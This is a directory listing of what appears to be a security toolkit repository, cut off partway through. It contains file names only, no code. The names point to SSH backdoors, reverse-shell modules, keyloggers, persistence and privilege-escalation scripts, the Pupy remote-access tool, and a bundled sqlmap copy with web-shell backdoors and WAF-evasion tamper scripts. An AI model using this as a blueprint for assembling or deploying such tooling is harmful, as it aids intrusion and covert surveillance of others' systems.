├── LICENSE ├── NoobSecToolkit - MAC OSX ├── .DS_Store ├── NSToolkit.py ├── scripts │ ├── .DS_Store │ ├── Hash_ID.py │ ├── NumberConverter.py │ ├── OSCAR │ │ ├── .gitignore │ │ ├── DEPENDENCY_CHECK.py │ │ ├── OSCARf.py │ │ ├── config │ │ │ ├── ports.txt │ │ │ ├── rssfeeds.dat │ │ │ ├── rssfilter.dat │ │ │ └── webscrape.dat │ │ ├── pastebin │ │ │ ├── downloaded │ │ │ │ └── test.test │ │ │ └── test.test │ │ ├── plugins │ │ │ ├── __init__.py │ │ │ ├── asciis.py │ │ │ ├── domainip.py │ │ │ ├── fblookup.py │ │ │ ├── instag.py │ │ │ ├── ipinfo.py │ │ │ ├── linked.py │ │ │ ├── newsfeed.py │ │ │ ├── oscrtwitter.py │ │ │ ├── oshodan.py │ │ │ ├── portlook.py │ │ │ ├── pyscrape.py │ │ │ ├── sslscan.py │ │ │ └── webscrape.py │ │ ├── requirements.txt │ │ ├── rss │ │ │ ├── feeds.dat │ │ │ ├── filter.dat │ │ │ └── news │ │ │ │ └── test.test │ │ └── setup │ │ │ ├── DEPENDENCY_CHECK.py │ │ │ ├── README.md │ │ │ ├── requirements.txt │ │ │ └── setup.py │ ├── decode.py │ ├── dns.py │ ├── dping.py │ ├── finder.pl │ ├── hex_converter.py │ ├── hw5.py │ ├── macspoof.py │ ├── mir.py │ ├── nextpenbox.py │ ├── pySteg │ │ └── pysteg.py │ ├── sqli.py │ ├── sshbackdoors │ │ ├── .gitignore │ │ ├── .travis.yml │ │ ├── README.md │ │ ├── backdoors │ │ │ ├── __init__.py │ │ │ ├── access │ │ │ │ ├── remove_ssh.py │ │ │ │ ├── ssh_key.py │ │ │ │ └── ssh_port.py │ │ │ ├── auxiliary │ │ │ │ ├── append.py │ │ │ │ ├── immutable.py │ │ │ │ ├── keylogger.py │ │ │ │ ├── option.py │ │ │ │ ├── simplehttp.py │ │ │ │ ├── user.py │ │ │ │ ├── web.py │ │ │ │ └── web │ │ │ │ │ └── install.sh │ │ │ ├── backdoor.py │ │ │ ├── escalation │ │ │ │ ├── setuid.py │ │ │ │ └── shell.py │ │ │ ├── option.py │ │ │ ├── shell │ │ │ │ ├── bash.py │ │ │ │ ├── bash2.py │ │ │ │ ├── metasploit.py │ │ │ │ ├── netcat.py │ │ │ │ ├── netcat_traditional.py │ │ │ │ ├── perl.py │ │ │ │ ├── perl │ │ │ │ │ ├── a.out │ │ │ │ │ ├── prs.pl │ │ │ │ │ ├── prs.pl~ │ │ │ │ │ ├── prs1 │ │ │ │ │ ├── prs2 │ │ │ │ │ └── prsA.pl │ │ │ │ ├── php.py │ │ │ │ ├── pupy.py │ │ │ │ ├── pupy │ │ │ │ │ ├── .gitignore │ │ │ │ │ ├── LICENSE │ │ │ │ │ ├── README.md │ │ │ │ │ ├── client │ │ │ │ │ │ ├── additional_imports.py │ │ │ │ │ │ ├── build_library_helper.py │ │ │ │ │ │ ├── reverse_ssl.py │ │ │ │ │ │ └── sources │ │ │ │ │ │ │ ├── GetProcAddressR.c │ │ │ │ │ │ │ ├── GetProcAddressR.h │ │ │ │ │ │ │ ├── LICENSES.txt │ │ │ │ │ │ │ ├── LoadLibraryR.c │ │ │ │ │ │ │ ├── LoadLibraryR.h │ │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ │ ├── MemoryModule.c │ │ │ │ │ │ │ ├── MemoryModule.h │ │ │ │ │ │ │ ├── MyLoadLibrary.c │ │ │ │ │ │ │ ├── MyLoadLibrary.h │ │ │ │ │ │ │ ├── Python-dynload.c │ │ │ │ │ │ │ ├── Python-dynload.h │ │ │ │ │ │ │ ├── Python-version.h │ │ │ │ │ │ │ ├── ReflectiveDllInjection.h │ │ │ │ │ │ │ ├── ReflectiveLoader.c │ │ │ │ │ │ │ ├── ReflectiveLoader.h │ │ │ │ │ │ │ ├── _memimporter.c │ │ │ │ │ │ │ ├── actctx.c │ │ │ │ │ │ │ ├── actctx.h │ │ │ │ │ │ │ ├── base_dispatch.c │ │ │ │ │ │ │ ├── base_inject.c │ │ │ │ │ │ │ ├── base_inject.h │ │ │ │ │ │ │ ├── gen_library_compressed_string.py │ │ │ │ │ │ │ ├── gen_python_bootloader.py │ │ │ │ │ │ │ ├── gen_resource_header.py │ │ │ │ │ │ │ ├── import-tab.c │ │ │ │ │ │ │ ├── import-tab.h │ │ │ │ │ │ │ ├── list.c │ │ │ │ │ │ │ ├── list.h │ │ │ │ │ │ │ ├── main_exe.c │ │ │ │ │ │ │ ├── main_reflective.c │ │ │ │ │ │ │ ├── makex64.bat │ │ │ │ │ │ │ ├── makex86.bat │ │ │ │ │ │ │ ├── mktab.py │ │ │ │ │ │ │ ├── pupy.c │ │ │ │ │ │ │ ├── pupy_load.c │ │ │ │ │ │ │ ├── pupy_load.h │ │ │ │ │ │ │ ├── remote_thread.c │ │ │ │ │ │ │ ├── remote_thread.h │ │ │ │ │ │ │ ├── resource_python_manifest.c │ │ │ │ │ │ │ ├── resources │ │ │ │ │ │ │ ├── iter_files.py │ │ │ │ │ │ │ └── library_patches │ │ │ │ │ │ │ │ └── uuid.py │ │ │ │ │ │ │ ├── thread.c │ │ │ │ │ │ │ └── thread.h │ │ │ │ │ └── pupy │ │ │ │ │ │ ├── crypto │ │ │ │ │ │ ├── cert.pem │ │ │ │ │ │ ├── gen.sh │ │ │ │ │ │ └── server.pem │ │ │ │ │ │ ├── modules │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── download.py │ │ │ │ │ │ ├── exit.py │ │ │ │ │ │ ├── get_info.py │ │ │ │ │ │ ├── getprivs.py │ │ │ │ │ │ ├── interactive_shell.py │ │ │ │ │ │ ├── keylogger.py │ │ │ │ │ │ ├── memory_exec.py │ │ │ │ │ │ ├── migrate.py │ │ │ │ │ │ ├── mouselogger.py │ │ │ │ │ │ ├── msgbox.py │ │ │ │ │ │ ├── persistence.py │ │ │ │ │ │ ├── portfwd.py │ │ │ │ │ │ ├── process_kill.py │ │ │ │ │ │ ├── ps.py │ │ │ │ │ │ ├── pyexec.py │ │ │ │ │ │ ├── pyshell.py │ │ │ │ │ │ ├── screenshot.py │ │ │ │ │ │ ├── search.py │ │ │ │ │ │ ├── shell_exec.py │ │ │ │ │ │ ├── shellcode_exec.py │ │ │ │ │ │ ├── socks5proxy.py │ │ │ │ │ │ ├── upload.py │ │ │ │ │ │ └── webcamsnap.py │ │ │ │ │ │ ├── packages │ │ │ │ │ │ ├── all │ │ │ │ │ │ │ ├── interactive_shell.py │ │ │ │ │ │ │ ├── pupyimporter.py │ │ │ │ │ │ │ └── pupyutils │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ └── search.py │ │ │ │ │ │ ├── src │ │ │ │ │ │ │ ├── VideoCapture │ │ │ │ │ │ │ │ ├── LGPL.txt │ │ │ │ │ │ │ │ └── src │ │ │ │ │ │ │ │ │ ├── VideoCapture.py │ │ │ │ │ │ │ │ │ ├── fixhtml.py │ │ │ │ │ │ │ │ │ ├── helvB08.pil │ │ │ │ │ │ │ │ │ ├── helvB08.png │ │ │ │ │ │ │ │ │ ├── helvetica-10.pil │ │ │ │ │ │ │ │ │ ├── helvetica-10.png │ │ │ │ │ │ │ │ │ ├── mkdist.py │ │ │ │ │ │ │ │ │ ├── vidcap.dsp │ │ │ │ │ │ │ │ │ ├── vidcap.dsw │ │ │ │ │ │ │ │ │ └── vidcapmodule.cpp │ │ │ │ │ │ │ └── pupymemexec │ │ │ │ │ │ │ │ ├── in-mem-exe.c │ │ │ │ │ │ │ │ ├── make.bat │ │ │ │ │ │ │ │ ├── makex64.bat │ │ │ │ │ │ │ │ └── pupymemexec.c │ │ │ │ │ │ └── windows │ │ │ │ │ │ │ ├── all │ │ │ │ │ │ │ └── pupwinutils │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ ├── keylogger.py │ │ │ │ │ │ │ │ ├── memexec.py │ │ │ │ │ │ │ │ ├── mouselogger.py │ │ │ │ │ │ │ │ ├── msgbox.py │ │ │ │ │ │ │ │ ├── persistence.py │ │ │ │ │ │ │ │ ├── processes.py │ │ │ │ │ │ │ │ ├── screenshot.py │ │ │ │ │ │ │ │ ├── security.py │ │ │ │ │ │ │ │ └── shellcode.py │ │ │ │ │ │ │ ├── amd64 │ │ │ │ │ │ │ ├── psutil │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ ├── _common.py │ │ │ │ │ │ │ │ ├── _compat.py │ │ │ │ │ │ │ │ ├── _psbsd.py │ │ │ │ │ │ │ │ ├── _pslinux.py │ │ │ │ │ │ │ │ ├── _psosx.py │ │ │ │ │ │ │ │ ├── _psposix.py │ │ │ │ │ │ │ │ ├── _pssunos.py │ │ │ │ │ │ │ │ ├── _psutil_windows.pyd │ │ │ │ │ │ │ │ └── _pswindows.py │ │ │ │ │ │ │ ├── pupymemexec.pyd │ │ │ │ │ │ │ └── vidcap.pyd │ │ │ │ │ │ │ └── x86 │ │ │ │ │ │ │ ├── psutil │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── _common.py │ │ │ │ │ │ │ ├── _compat.py │ │ │ │ │ │ │ ├── _psbsd.py │ │ │ │ │ │ │ ├── _pslinux.py │ │ │ │ │ │ │ ├── _psosx.py │ │ │ │ │ │ │ ├── _psposix.py │ │ │ │ │ │ │ ├── _pssunos.py │ │ │ │ │ │ │ ├── _psutil_windows.pyd │ │ │ │ │ │ │ └── _pswindows.py │ │ │ │ │ │ │ ├── pupymemexec.pyd │ │ │ │ │ │ │ └── vidcap.pyd │ │ │ │ │ │ ├── pupy.conf │ │ │ │ │ │ ├── pupygen.py │ │ │ │ │ │ ├── pupylib │ │ │ │ │ │ ├── PupyClient.py │ │ │ │ │ │ ├── PupyCmd.py │ │ │ │ │ │ ├── PupyCompleter.py │ │ │ │ │ │ ├── PupyErrors.py │ │ │ │ │ │ ├── PupyJob.py │ │ │ │ │ │ ├── PupyModule.py │ │ │ │ │ │ ├── PupyServer.py │ │ │ │ │ │ ├── PupyService.py │ │ │ │ │ │ ├── PythonCompleter.py │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── utils │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── network.py │ │ │ │ │ │ │ ├── pe.py │ │ │ │ │ │ │ └── rpyc_utils.py │ │ │ │ │ │ └── pupysh.py │ │ │ │ ├── pyth.py │ │ │ │ ├── pythScript │ │ │ │ │ ├── pythBackdoor.py │ │ │ │ │ ├── pythPart1 │ │ │ │ │ └── pythPart2 │ │ │ │ └── web.py │ │ │ ├── template.py │ │ │ └── windows │ │ │ │ └── windows.py │ │ ├── definitions.py │ │ ├── dependencies.py │ │ ├── imports.py │ │ ├── master.py │ │ ├── modules │ │ │ ├── __init__.py │ │ │ ├── addUser.py │ │ │ ├── cron.py │ │ │ ├── module.py │ │ │ ├── option.py │ │ │ ├── poison.py │ │ │ ├── startup.py │ │ │ ├── template.py │ │ │ ├── web │ │ │ │ ├── env1 │ │ │ │ ├── env2 │ │ │ │ ├── envvars │ │ │ │ └── install.sh │ │ │ ├── webMod.py │ │ │ └── whitelist.py │ │ ├── requirements.txt │ │ ├── rpyc │ │ │ ├── __init__.py │ │ │ ├── core │ │ │ │ ├── __init__.py │ │ │ │ ├── async.py │ │ │ │ ├── brine.py │ │ │ │ ├── channel.py │ │ │ │ ├── consts.py │ │ │ │ ├── netref.py │ │ │ │ ├── protocol.py │ │ │ │ ├── reactor.py │ │ │ │ ├── service.py │ │ │ │ ├── stream.py │ │ │ │ └── vinegar.py │ │ │ ├── experimental │ │ │ │ ├── __init__.py │ │ │ │ ├── retunnel.py │ │ │ │ └── splitbrain.py │ │ │ ├── lib │ │ │ │ ├── __init__.py │ │ │ │ ├── colls.py │ │ │ │ └── compat.py │ │ │ ├── utils │ │ │ │ ├── __init__.py │ │ │ │ ├── authenticators.py │ │ │ │ ├── classic.py │ │ │ │ ├── factory.py │ │ │ │ ├── helpers.py │ │ │ │ ├── registry.py │ │ │ │ ├── server.py │ │ │ │ ├── teleportation.py │ │ │ │ └── zerodeploy.py │ │ │ └── version.py │ │ ├── start.py │ │ ├── target.py │ │ ├── target.pyc │ │ ├── tests.py │ │ └── tmp │ │ │ ├── bashStatus.txt │ │ │ ├── initd │ │ │ ├── ls │ │ │ ├── lsa.c │ │ │ ├── p.c │ │ │ └── poison.c │ ├── steghidecracker.py │ ├── toolbox.py │ ├── vpn.py │ └── vulscan.py └── tools │ ├── .DS_Store │ ├── harvester │ ├── .gitignore │ ├── COPYING │ ├── LICENSES │ ├── README │ ├── changelog.txt │ ├── discovery │ │ ├── DNS │ │ │ ├── Base.py │ │ │ ├── Class.py │ │ │ ├── Lib.py │ │ │ ├── Opcode.py │ │ │ ├── Status.py │ │ │ ├── Type.py │ │ │ ├── __init__.py │ │ │ ├── lazy.py │ │ │ └── win32dns.py │ │ ├── IPy.py │ │ ├── __init__.py │ │ ├── asksearch.py │ │ ├── baidusearch.py │ │ ├── bingsearch.py │ │ ├── dnssearch-threads.py │ │ ├── dnssearch.py │ │ ├── dogpilesearch.py │ │ ├── exaleadsearch.py │ │ ├── googleCSE.py │ │ ├── googleplussearch.py │ │ ├── googlesearch.py │ │ ├── googlesets.py │ │ ├── jigsaw.py │ │ ├── linkedinsearch.py │ │ ├── pgpsearch.py │ │ ├── shodan │ │ │ ├── __init__.py │ │ │ ├── api.py │ │ │ └── wps.py │ │ ├── shodansearch.py │ │ ├── twittersearch.py │ │ ├── yahoosearch.py │ │ └── yandexsearch.py │ ├── myparser.py │ ├── tests │ │ └── myparser_test.py │ └── theHarvester.py │ ├── inject │ ├── .gitattributes │ ├── .gitignore │ ├── CONTRIBUTING.md │ ├── README.md │ ├── doc │ │ ├── AUTHORS │ │ ├── CHANGELOG.md │ │ ├── COPYING │ │ ├── FAQ.pdf │ │ ├── README.pdf │ │ ├── THANKS.md │ │ ├── THIRD-PARTY.md │ │ └── translations │ │ │ ├── README-gr-GR.md │ │ │ ├── README-hr-HR.md │ │ │ ├── README-id-ID.md │ │ │ ├── README-pt-BR.md │ │ │ └── README-zh-CN.md │ ├── extra │ │ ├── __init__.py │ │ ├── beep │ │ │ ├── __init__.py │ │ │ ├── beep.py │ │ │ └── beep.wav │ │ ├── cloak │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── cloak.py │ │ ├── dbgtool │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── dbgtool.py │ │ ├── icmpsh │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ ├── icmpsh-m.c │ │ │ ├── icmpsh-m.pl │ │ │ ├── icmpsh-s.c │ │ │ ├── icmpsh.exe_ │ │ │ └── icmpsh_m.py │ │ ├── mssqlsig │ │ │ └── update.py │ │ ├── runcmd │ │ │ ├── README.txt │ │ │ └── windows │ │ │ │ ├── README.txt │ │ │ │ ├── runcmd.sln │ │ │ │ └── runcmd │ │ │ │ ├── runcmd.cpp │ │ │ │ ├── runcmd.vcproj │ │ │ │ ├── stdafx.cpp │ │ │ │ └── stdafx.h │ │ ├── safe2bin │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── safe2bin.py │ │ ├── shellcodeexec │ │ │ ├── README.txt │ │ │ ├── linux │ │ │ │ ├── shellcodeexec.x32_ │ │ │ │ └── shellcodeexec.x64_ │ │ │ └── windows │ │ │ │ └── shellcodeexec.x32.exe_ │ │ ├── shutils │ │ │ ├── blanks.sh │ │ │ ├── duplicates.py │ │ │ ├── pep8.sh │ │ │ ├── pyflakes.sh │ │ │ ├── pylint.py │ │ │ └── regressiontest.py │ │ └── sqlharvest │ │ │ ├── __init__.py │ │ │ └── sqlharvest.py │ ├── lib │ │ ├── __init__.py │ │ ├── controller │ │ │ ├── __init__.py │ │ │ ├── action.py │ │ │ ├── checks.py │ │ │ ├── controller.py │ │ │ └── handler.py │ │ ├── core │ │ │ ├── __init__.py │ │ │ ├── agent.py │ │ │ ├── bigarray.py │ │ │ ├── common.py │ │ │ ├── convert.py │ │ │ ├── data.py │ │ │ ├── datatype.py │ │ │ ├── decorators.py │ │ │ ├── defaults.py │ │ │ ├── dicts.py │ │ │ ├── dump.py │ │ │ ├── enums.py │ │ │ ├── exception.py │ │ │ ├── log.py │ │ │ ├── option.py │ │ │ ├── optiondict.py │ │ │ ├── profiling.py │ │ │ ├── readlineng.py │ │ │ ├── replication.py │ │ │ ├── revision.py │ │ │ ├── session.py │ │ │ ├── settings.py │ │ │ ├── shell.py │ │ │ ├── subprocessng.py │ │ │ ├── target.py │ │ │ ├── testing.py │ │ │ ├── threads.py │ │ │ ├── unescaper.py │ │ │ ├── update.py │ │ │ ├── wordlist.py │ │ │ └── xmldump.py │ │ ├── parse │ │ │ ├── __init__.py │ │ │ ├── banner.py │ │ │ ├── cmdline.py │ │ │ ├── configfile.py │ │ │ ├── handler.py │ │ │ ├── headers.py │ │ │ ├── html.py │ │ │ ├── payloads.py │ │ │ └── sitemap.py │ │ ├── request │ │ │ ├── __init__.py │ │ │ ├── basic.py │ │ │ ├── basicauthhandler.py │ │ │ ├── comparison.py │ │ │ ├── connect.py │ │ │ ├── direct.py │ │ │ ├── dns.py │ │ │ ├── httpshandler.py │ │ │ ├── inject.py │ │ │ ├── methodrequest.py │ │ │ ├── pkihandler.py │ │ │ ├── rangehandler.py │ │ │ ├── redirecthandler.py │ │ │ └── templates.py │ │ ├── takeover │ │ │ ├── __init__.py │ │ │ ├── abstraction.py │ │ │ ├── icmpsh.py │ │ │ ├── metasploit.py │ │ │ ├── registry.py │ │ │ ├── udf.py │ │ │ ├── web.py │ │ │ └── xp_cmdshell.py │ │ ├── techniques │ │ │ ├── __init__.py │ │ │ ├── blind │ │ │ │ ├── __init__.py │ │ │ │ └── inference.py │ │ │ ├── brute │ │ │ │ ├── __init__.py │ │ │ │ └── use.py │ │ │ ├── dns │ │ │ │ ├── __init__.py │ │ │ │ ├── test.py │ │ │ │ └── use.py │ │ │ ├── error │ │ │ │ ├── __init__.py │ │ │ │ └── use.py │ │ │ └── union │ │ │ │ ├── __init__.py │ │ │ │ ├── test.py │ │ │ │ └── use.py │ │ └── utils │ │ │ ├── __init__.py │ │ │ ├── api.py │ │ │ ├── crawler.py │ │ │ ├── deps.py │ │ │ ├── getch.py │ │ │ ├── google.py │ │ │ ├── hash.py │ │ │ ├── hashdb.py │ │ │ ├── htmlentities.py │ │ │ ├── pivotdumptable.py │ │ │ ├── progress.py │ │ │ ├── purge.py │ │ │ ├── sqlalchemy.py │ │ │ ├── timeout.py │ │ │ ├── versioncheck.py │ │ │ └── xrange.py │ ├── plugins │ │ ├── __init__.py │ │ ├── dbms │ │ │ ├── __init__.py │ │ │ ├── access │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── db2 │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── firebird │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── hsqldb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── maxdb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mssqlserver │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mysql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── oracle │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── postgresql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── sqlite │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ └── sybase │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ └── generic │ │ │ ├── __init__.py │ │ │ ├── connector.py │ │ │ ├── custom.py │ │ │ ├── databases.py │ │ │ ├── entries.py │ │ │ ├── enumeration.py │ │ │ ├── filesystem.py │ │ │ ├── fingerprint.py │ │ │ ├── misc.py │ │ │ ├── search.py │ │ │ ├── syntax.py │ │ │ ├── takeover.py │ │ │ └── users.py │ ├── procs │ │ ├── README.txt │ │ ├── mssqlserver │ │ │ ├── activate_sp_oacreate.sql │ │ │ ├── configure_openrowset.sql │ │ │ ├── configure_xp_cmdshell.sql │ │ │ ├── create_new_xp_cmdshell.sql │ │ │ ├── disable_xp_cmdshell_2000.sql │ │ │ ├── dns_request.sql │ │ │ ├── enable_xp_cmdshell_2000.sql │ │ │ └── run_statement_as_user.sql │ │ ├── mysql │ │ │ ├── dns_request.sql │ │ │ └── write_file_limit.sql │ │ ├── oracle │ │ │ └── dns_request.sql │ │ └── postgresql │ │ │ └── dns_request.sql │ ├── shell │ │ ├── README.txt │ │ ├── backdoor.asp_ │ │ ├── backdoor.aspx_ │ │ ├── backdoor.jsp_ │ │ ├── backdoor.php_ │ │ ├── runcmd.exe_ │ │ ├── stager.asp_ │ │ ├── stager.aspx_ │ │ ├── stager.jsp_ │ │ └── stager.php_ │ ├── sqlmap.conf │ ├── sqlmap.py │ ├── sqlmapapi.py │ ├── tamper │ │ ├── __init__.py │ │ ├── apostrophemask.py │ │ ├── apostrophenullencode.py │ │ ├── appendnullbyte.py │ │ ├── base64encode.py │ │ ├── between.py │ │ ├── bluecoat.py │ │ ├── chardoubleencode.py │ │ ├── charencode.py │ │ ├── charunicodeencode.py │ │ ├── concat2concatws.py │ │ ├── equaltolike.py │ │ ├── greatest.py │ │ ├── halfversionedmorekeywords.py │ │ ├── ifnull2ifisnull.py │ │ ├── informationschemacomment.py │ │ ├── lowercase.py │ │ ├── modsecurityversioned.py │ │ ├── modsecurityzeroversioned.py │ │ ├── multiplespaces.py │ │ ├── nonrecursivereplacement.py │ │ ├── overlongutf8.py │ │ ├── percentage.py │ │ ├── randomcase.py │ │ ├── randomcomments.py │ │ ├── securesphere.py │ │ ├── sp_password.py │ │ ├── space2comment.py │ │ ├── space2dash.py │ │ ├── space2hash.py │ │ ├── space2morehash.py │ │ ├── space2mssqlblank.py │ │ ├── space2mssqlhash.py │ │ ├── space2mysqlblank.py │ │ ├── space2mysqldash.py │ │ ├── space2plus.py │ │ ├── space2randomblank.py │ │ ├── symboliclogical.py │ │ ├── unionalltounion.py │ │ ├── unmagicquotes.py │ │ ├── uppercase.py │ │ ├── varnish.py │ │ ├── versionedkeywords.py │ │ ├── versionedmorekeywords.py │ │ └── xforwardedfor.py │ ├── thirdparty │ │ ├── __init__.py │ │ ├── ansistrm │ │ │ ├── __init__.py │ │ │ └── ansistrm.py │ │ ├── beautifulsoup │ │ │ ├── __init__.py │ │ │ └── beautifulsoup.py │ │ ├── bottle │ │ │ ├── __init__.py │ │ │ └── bottle.py │ │ ├── chardet │ │ │ ├── __init__.py │ │ │ ├── big5freq.py │ │ │ ├── big5prober.py │ │ │ ├── chardetect.py │ │ │ ├── chardistribution.py │ │ │ ├── charsetgroupprober.py │ │ │ ├── charsetprober.py │ │ │ ├── codingstatemachine.py │ │ │ ├── compat.py │ │ │ ├── constants.py │ │ │ ├── cp949prober.py │ │ │ ├── escprober.py │ │ │ ├── escsm.py │ │ │ ├── eucjpprober.py │ │ │ ├── euckrfreq.py │ │ │ ├── euckrprober.py │ │ │ ├── euctwfreq.py │ │ │ ├── euctwprober.py │ │ │ ├── gb2312freq.py │ │ │ ├── gb2312prober.py │ │ │ ├── hebrewprober.py │ │ │ ├── jisfreq.py │ │ │ ├── jpcntx.py │ │ │ ├── langbulgarianmodel.py │ │ │ ├── langcyrillicmodel.py │ │ │ ├── langgreekmodel.py │ │ │ ├── langhebrewmodel.py │ │ │ ├── langhungarianmodel.py │ │ │ ├── langthaimodel.py │ │ │ ├── latin1prober.py │ │ │ ├── mbcharsetprober.py │ │ │ ├── mbcsgroupprober.py │ │ │ ├── mbcssm.py │ │ │ ├── sbcharsetprober.py │ │ │ ├── sbcsgroupprober.py │ │ │ ├── sjisprober.py │ │ │ ├── universaldetector.py │ │ │ └── utf8prober.py │ │ ├── clientform │ │ │ ├── __init__.py │ │ │ └── clientform.py │ │ ├── colorama │ │ │ ├── __init__.py │ │ │ ├── ansi.py │ │ │ ├── ansitowin32.py │ │ │ ├── initialise.py │ │ │ ├── win32.py │ │ │ └── winterm.py │ │ ├── fcrypt │ │ │ ├── __init__.py │ │ │ └── fcrypt.py │ │ ├── gprof2dot │ │ │ ├── __init__.py │ │ │ └── gprof2dot.py │ │ ├── keepalive │ │ │ ├── __init__.py │ │ │ └── keepalive.py │ │ ├── magic │ │ │ ├── __init__.py │ │ │ └── magic.py │ │ ├── multipart │ │ │ ├── __init__.py │ │ │ └── multipartpost.py │ │ ├── odict │ │ │ ├── __init__.py │ │ │ └── odict.py │ │ ├── oset │ │ │ ├── LICENSE.txt │ │ │ ├── __init__.py │ │ │ ├── _abc.py │ │ │ └── pyoset.py │ │ ├── pagerank │ │ │ ├── __init__.py │ │ │ └── pagerank.py │ │ ├── prettyprint │ │ │ ├── __init__.py │ │ │ └── prettyprint.py │ │ ├── pydes │ │ │ ├── __init__.py │ │ │ └── pyDes.py │ │ ├── socks │ │ │ ├── LICENSE │ │ │ ├── __init__.py │ │ │ └── socks.py │ │ ├── termcolor │ │ │ ├── __init__.py │ │ │ └── termcolor.py │ │ └── xdot │ │ │ ├── __init__.py │ │ │ └── xdot.py │ ├── txt │ │ ├── common-columns.txt │ │ ├── common-outputs.txt │ │ ├── common-tables.txt │ │ ├── keywords.txt │ │ ├── smalldict.txt │ │ ├── user-agents.txt │ │ └── wordlist.zip │ ├── udf │ │ ├── README.txt │ │ ├── mysql │ │ │ ├── linux │ │ │ │ ├── 32 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ │ └── 64 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ └── windows │ │ │ │ ├── 32 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ │ │ └── 64 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ └── postgresql │ │ │ ├── linux │ │ │ ├── 32 │ │ │ │ ├── 8.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── 64 │ │ │ │ ├── 8.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── windows │ │ │ └── 32 │ │ │ ├── 8.2 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.3 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.4 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ └── 9.0 │ │ │ └── lib_postgresqludf_sys.dll_ │ ├── waf │ │ ├── 360.py │ │ ├── __init__.py │ │ ├── airlock.py │ │ ├── anquanbao.py │ │ ├── baidu.py │ │ ├── barracuda.py │ │ ├── bigip.py 